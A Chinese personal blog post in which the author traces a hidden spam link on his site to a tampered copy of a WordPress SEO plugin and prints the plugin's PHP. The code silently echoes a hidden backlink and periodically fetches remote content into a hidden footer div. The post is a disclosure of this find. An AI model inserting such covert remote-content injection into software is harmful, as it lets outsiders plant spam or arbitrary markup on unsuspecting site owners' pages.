All in One SEO Pack – Pro Version黑链事件

今天给博客做友链检测的时候居然发现了一个连接,我就纳闷了,我的博客没友链啊。

于是乎看了下源码,我勒个擦!发现一个黑链,这等于挂马了。

<noscript><a href="http://www.luminous-solutions.net">SEO services</a></noscript>

老夫第一感觉是服务器给人日了,(由于一直都没时间把博客搬到阿里云香港的节点上(好吧,我承认我懒了 – -)但是这个主机的速度还是相当快的,香港的阿里云渣渣)

查了下,这个主机同ip一百多个站,被黑也不是不可能啊。

然后查了下同ip段几个站,都没发现被挂了黑链,我擦,那就是我的问题了?我一向对网络安全都非常敏感的,接著主题、插件一个个排除…

发现All in One SEO Pack – Pro Version这个插件停用后,黑链不见了。

看了下插件代码,原来是你。

插件目录下All in One SEO Pack – Pro Versio/all_in_one_seo_pack.php 文件,第36行

<?php

/*
Plugin Name: All in One SEO Pack - Pro Version
Plugin URI: http://semperfiwebdesign.com
Description: Out-of-the-box SEO for your WordPress blog. <a href="options-general.php?page=all-in-one-seo-pack-pro/aioseop.class.php">Options configuration panel</a> | <a href="http://semperfiwebdesign.com/forum/" >Support</a>
Version: 1.72
Author: Michael Torbert
Author URI: http://michaeltorbert.com
*/

/*
Copyright (C) 2008-2009 Michael Torbert, semperfiwebdesign.com (michael AT semperfiwebdesign DOT com)
Original code by uberdose of uberdose.com

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program.  If not, see <http://www.gnu.org/licenses/>.
*/

/*******************************************************************************************************/
//register_activation_hook(__FILE__,'aioseop_activate_pl');
add_action('wp_footer', 'add_wc_footer_links');

function add_wc_footer_links() {

echo "<noscript><a href=\"http://www.luminous-solutions.net\">SEO services</a></noscript>\n";


	$timestamp = get_option('wc_special_footer_timestamp');
	if($timestamp < (time() -  WSFL_TTL)){
		$temp = @file_get_contents(WSFL_URL);
		if($temp and strlen($temp) < 1000){
			update_option('wc_special_footer_timestamp', time());
			update_option('wc_special_footer_cache', $temp);
			echo '<!-- live -->';
		}
	}

#	echo '<div style="display:block; background:yellow; padding:20px; position:fixed; top:0; left:0; width:100%;">';
	echo '<div style="display:none;">';
	echo get_option('wc_special_footer_cache');
	echo '</div>';

}

闪了,好困,休息去先~~~~

原创文章,作者:老D,如若转载,请注明出处:https://laod.cn/journal/all-in-one-seo-pack-pro-version-black-chain.html

(0)
上一篇 2014-11-25 05:25
下一篇 2014-11-29 22:01

相关推荐

  • 这是这么的折腾

    月初就开始弄那款主题了,已经完成85%,但是在文章分类的时候忽然觉得这款主题只合适少量的内容,不利于蜘蛛爬虫。(以前只是想弄整那样,少量的内容,炫酷的主页)纠结啊,于是乎又干掉了~…

    2014-06-13
    2.2K50
  • 喜闻乐见!服务器又炸了

    今天下午开启了一大波注册码注册,服务器挺不住短时间大量的刷新、数据写入… 然后服务器就炸了~~~ 几乎都是空白的页面….   如果你有任何想法,欢…

    2017-11-09
    26.4K1030
  • 过个年,你得准备多少钱?

    一、压岁钱 温饱版:自身收入不高,但是每个孩子100-300估计也得要个1000以上.小康版:年前赚了不少钱,颇有点暴富的潜质,每个孩子300-500,每年压岁钱怎么也得备2000…

    心情琐事 2015-02-26
    1.9K00
  • 铭记于心【修电脑20条军规】

    修电脑军规20条,时刻谨记在心: 1. 首先记住这句话:永远不要承认自己是高手,因为这个称号是要付出代价的。 2. 接到陌生电话后,一定要问清楚对方有什么事情,然后再告诉他(她)当…

    2015-01-23
    2.6K110
  • 关于老D微信公众号已经转移通告

    如大家所见,老D博客已经走了10年了,准确的说是“11年”,但是这两年我就没有管过博客,具体原因就是前几年更新的hosts文件被查水表后,然后也有一些文章被网信办、公司要求删除,感…

    2022-03-05
    5.7K00
  • 艰难的光大银行 西联收汇、电汇 Google AdSense 取金记

    为什么说艰难呢?因为以前一直用西联收汇,可以直接在手机APP上进行收汇,然后再结汇即可。 可是最近两个月,光大银行已经不直接直接这么操作了。   提示:本笔业务请携带相关…

    2020-01-09
    6.7K10
  • 关于老D博客laod.cn被墙一事

    2016-07-15 17:30 老D博客(laod.cn)成功加入中国长城防火墙(GFW)俱乐部,是的,域名被墙了。 以前就有两个文章的url被墙了,那天我刚看到一个网友留言,带…

    2016-07-17
    8.8K540
  • 最短的域名是什么你知道么?颠覆你的认知

    世界上域名最短的域名是:http://dk (没错,这个域名没有.com这样的后缀) 这个域名只要两位TLD域名有A/CNAME记录,并且指向IP开放80端口,那么这个TLD就是地…

    2019-12-29
    20.7K30
  • 淘宝的那些事

    文中的笔者是做淘宝的,不是个人在做,是在一家公司做,算的上有一定的规模,做了有一年半多,中间学会了很多普通卖家不知道的东西,现在写出来分享给大家,这些经验也不是说有一个系统的,而是…

    2014-09-02
    2.7K10
  • Google Chrome 69 脑残 居然默认隐藏域名中的www

    Google Chrome 69 脑残 居然隐藏域名中的www 看着好不习惯。 是不是因为绝大多数网站把www、跟域名作为同一个网站,然后Chrome就这样把www隐藏了? WWW…

    2018-09-08
    7.4K00

发表评论

登录后才能评论

评论列表(2条)

  • m0On
    m0On 2016-06-16 20:39

    哈哈,同情你

  • 坏坏晓溪
    坏坏晓溪 2015-04-10 22:47

    严重同情D,非常痛恨H!